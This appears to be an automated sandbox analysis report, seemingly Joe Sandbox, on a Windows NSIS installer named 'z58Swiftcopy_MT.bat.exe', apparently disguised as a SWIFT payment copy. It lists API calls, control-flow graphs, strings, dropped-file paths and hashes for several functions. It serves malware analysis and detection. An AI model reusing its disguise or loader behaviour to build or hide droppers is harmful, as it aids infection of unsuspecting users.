                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                                                      • API String ID: 2803837635-3007723893
                                                                                                                                                                                                                                      • Opcode ID: 4785f0ebff018845c403b6ca7344f0ae65bd881e692373c18b1951fa0e6bcd5c
                                                                                                                                                                                                                                      • Instruction ID: 415a6227fd12514a0fe47228c9aaee062227cda2d2dbc78d85e3b2e5f7ba07c2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4785f0ebff018845c403b6ca7344f0ae65bd881e692373c18b1951fa0e6bcd5c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2561B271A40205ABDB20EF64DE89B9E7AB8EB40358F20413BF514B62D1DB7C99419B9C
                                                                                                                                                                                                                                      Function 004060BB Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 278 4060bb-4060c6 279 4060c8-4060d7 278->279 280 4060d9-4060ef 278->280 279->280 281 4062e0-4062e4 280->281 282 4060f5-406100 280->282 284 406112-40611c 281->284 285 4062ea-4062f4 281->285 282->281 283 406106-40610d 282->283 283->281 284->285 286 406122-406129 284->286 287 4062f6-4062fa call 406099 285->287 288 4062ff-406300 285->288 289 4062d3 286->289 290 40612f-406163 286->290 287->288 292 4062d5-4062db 289->292 293 4062dd-4062df 289->293 294 406280-406283 290->294 295 406169-406173 290->295 292->281 293->281 298 4062b3-4062b6 294->298 299 406285-406288 294->299 296 406175-406179 295->296 297 40618d 295->297 296->297 302 40617b-40617f 296->302 305 406194-40619b 297->305 300 4062c4-4062d1 lstrlenA 298->300 301 4062b8-4062bf call 4060bb 298->301 303 406298-4062a4 call 406099 299->303 304 40628a-406296 call 405ff7 299->304 300->281 301->300 302->297 307 406181-406185 302->307 316 4062a9-4062af 303->316 304->316 309 4061a0-4061a2 305->309 310 40619d-40619f 305->310 307->297 312 406187-40618b 307->312 314 4061a4-4061c7 call 405f80 309->314 315 4061db-4061de 309->315 310->309 312->305 326 406267-40626b 314->326 327 4061cd-4061d6 call 4060bb 314->327 317 4061e0-4061ec GetSystemDirectoryA 315->317 318 4061ee-4061f1 315->318 316->300 320 4062b1 316->320 323 406262-406265 317->323 324 4061f3-406201 GetWindowsDirectoryA 318->324 325 40625e-406260 318->325 322 406278-40627e call 406303 320->322 322->300 323->322 323->326 324->325 325->323 328 406203-40620d 325->328 326->322 331 40626d-406273 lstrcatA 326->331 327->323 333 406227-40623d SHGetSpecialFolderLocation 328->333 334 40620f-406212 328->334 331->322 337 40625b 333->337 338 40623f-406259 SHGetPathFromIDListA CoTaskMemFree 333->338 334->333 336 406214-40621b 334->336 339 406223-406225 336->339 337->325 338->323 338->337 339->323 339->333
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004061E6
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,00420510,00000000,004051F8,00420510,00000000), ref: 004061F9
                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(004051F8,00000000,?,00420510,00000000,004051F8,00420510,00000000), ref: 00406235
                                                                                                                                                                                                                                      • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406243
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040624F
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406273
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(Call,?,00420510,00000000,004051F8,00420510,00000000,00000000,00000000,00000000), ref: 004062C5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                                                                                                      • API String ID: 717251189-3319343437
                                                                                                                                                                                                                                      • Opcode ID: ab93b42b91f91bae910e6fac62c15208670ece31f71cd1d64f2b49d88cab81d9
                                                                                                                                                                                                                                      • Instruction ID: 009d83548d98726144a2e54fa316bc550aecd198e2c9f4ca7d92c8f0a1cd1b24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab93b42b91f91bae910e6fac62c15208670ece31f71cd1d64f2b49d88cab81d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7361F271900105AEDF20AF64C894B7A3BA4EB56710F1241BFE913BA2D1C77C8962CB4E
                                                                                                                                                                                                                                      Function 00401759 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 340 401759-40177c call 402ac1 call 405a9e 345 401786-401798 call 406099 call 405a31 lstrcatA 340->345 346 40177e-401784 call 406099 340->346 351 40179d-4017a3 call 406303 345->351 346->351 356 4017a8-4017ac 351->356 357 4017ae-4017b8 call 40639c 356->357 358 4017df-4017e2 356->358 365 4017ca-4017dc 357->365 366 4017ba-4017c8 CompareFileTime 357->366 360 4017e4-4017e5 call 405c0d 358->360 361 4017ea-401806 call 405c32 358->361 360->361 368 401808-40180b 361->368 369 40187e-4018a7 call 4051c0 call 40303e 361->369 365->358 366->365 371 401860-40186a call 4051c0 368->371 372 40180d-40184f call 406099 * 2 call 4060bb call 406099 call 4057b5 368->372 383 4018a9-4018ad 369->383 384 4018af-4018bb SetFileTime 369->384 381 401873-401879 371->381 372->356 404 401855-401856 372->404 385 40295a 381->385 383->384 387 4018c1-4018cc CloseHandle 383->387 384->387 388 40295c-402960 385->388 390 402951-402954 387->390 391 4018d2-4018d5 387->391 390->385 393 4018d7-4018e8 call 4060bb lstrcatA 391->393 394 4018ea-4018ed call 4060bb 391->394 398 4018f2-4022e6 call 4057b5 393->398 394->398 398->388 404->381 406 401858-401859 404->406 406->371
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                                                                        • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne$C:\Users\user\AppData\Local\Temp\nsb9327.tmp$C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dll$Call$user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                                                                                                      • API String ID: 1941528284-1350192652
                                                                                                                                                                                                                                      • Opcode ID: 6d4c10959a53388a6810b5416c206514c44b4a0d35f0a660f1aca1b6d6b68858
                                                                                                                                                                                                                                      • Instruction ID: 2c94bdb1ed45b9066cdaff59bd30f99cb4fab6046a6a22cdc065c2defd4e90a3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d4c10959a53388a6810b5416c206514c44b4a0d35f0a660f1aca1b6d6b68858
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD41D871A00615BBCB10BFB5CC45EAF3669EF01329B21823FF522B10E1D77C89518A6E
                                                                                                                                                                                                                                      Function 00405686 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 476 405686-4056d1 CreateDirectoryA 477 4056d3-4056d5 476->477 478 4056d7-4056e4 GetLastError 476->478 479 4056fe-405700 477->479 478->479 480 4056e6-4056fa SetFileSecurityA 478->480 480->477 481 4056fc GetLastError 480->481 481->479
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004056DD
                                                                                                                                                                                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004056F2
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004056FC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004056AC
                                                                                                                                                                                                                                      • C:\Users\user\Desktop, xrefs: 00405686
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                                                      • API String ID: 3449924974-26219170
                                                                                                                                                                                                                                      • Opcode ID: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                                                                                                                                                                                                      • Instruction ID: f1d10c799bfca9e4ec05a1b7c6bbaf57c6c97cfabee98fddb41b1e3f6ffc1dc8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13010871D10259EADF109FA4C9047EFBFB8EB14315F10447AD544B6290DB7A9604CFA9
                                                                                                                                                                                                                                      Function 004063C3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 482 4063c3-4063e3 GetSystemDirectoryA 483 4063e5 482->483 484 4063e7-4063e9 482->484 483->484 485 4063f9-4063fb 484->485 486 4063eb-4063f3 484->486 488 4063fc-40642e wsprintfA LoadLibraryExA 485->488 486->485 487 4063f5-4063f7 486->487 487->488
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406413
                                                                                                                                                                                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                                                                      • API String ID: 2200240437-4240819195
                                                                                                                                                                                                                                      • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                                                                                                                                                      • Instruction ID: c4678dfb2da91d08484603cd09ba86b434f6c063b959f4a2bfe8732341513f46
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0FC7054060967DB149768DD0DFEB365CEB08304F14057EA587E10D1D978D8358B98
                                                                                                                                                                                                                                      Function 00401FFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 489 401ffd-402009 490 4020c4-4020c6 489->490 491 40200f-402025 call 402ac1 * 2 489->491 492 402237-40223c call 401423 490->492 502 402034-402042 LoadLibraryExA 491->502 503 402027-402032 GetModuleHandleA 491->503 498 402951-402960 492->498 499 402716-40271d 492->499 499->498 505 402044-402051 GetProcAddress 502->505 506 4020bd-4020bf 502->506 503->502 503->505 507 402090-402095 call 4051c0 505->507 508 402053-402059 505->508 506->492 513 40209a-40209d 507->513 509 402072-402089 call 100016bd 508->509 510 40205b-402067 call 401423 508->510 515 40208b-40208e 509->515 510->513 520 402069-402070 510->520 513->498 516 4020a3-4020ab call 403889 513->516 515->513 516->498 521 4020b1-4020b8 FreeLibrary 516->521 520->513 521->498
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                                                                                                                                                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • user32::EnumWindows(i r1 ,i 0), xrefs: 0040207C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                                      • String ID: user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                                                                                                      • API String ID: 2987980305-797600110
                                                                                                                                                                                                                                      • Opcode ID: 60fb46ecd7be2e423669211bfc99dba76962e3cb0b4c4fdd8d202bc87f238218
                                                                                                                                                                                                                                      • Instruction ID: b9fd2243ea981f5bcf097e6c9410b7191d7035710d5254353367cb498e194193
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60fb46ecd7be2e423669211bfc99dba76962e3cb0b4c4fdd8d202bc87f238218
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C21C971A04225A7CF207FA48E4DB6E7660AB44358F21413BF711B62D0CBBD4942965E
                                                                                                                                                                                                                                      Function 00405C61 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 523 405c61-405c6b 524 405c6c-405c97 GetTickCount GetTempFileNameA 523->524 525 405ca6-405ca8 524->525 526 405c99-405c9b 524->526 528 405ca0-405ca3 525->528 526->524 527 405c9d 526->527 527->528
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405C75
                                                                                                                                                                                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405C8F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • nsa, xrefs: 00405C6C
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe", xrefs: 00405C61
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C64
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                      • API String ID: 1716503409-3732674327
                                                                                                                                                                                                                                      • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                                                                                                                                                                                                      • Instruction ID: cf48cc2e124a12ae61d5b18fb9546061e9ffe7603c061e2a5f49afbd00461fe6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3F082363087047BEB108F55DC04B9B7F99DF91750F14803BFA48EA180D6B499648758
                                                                                                                                                                                                                                      Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
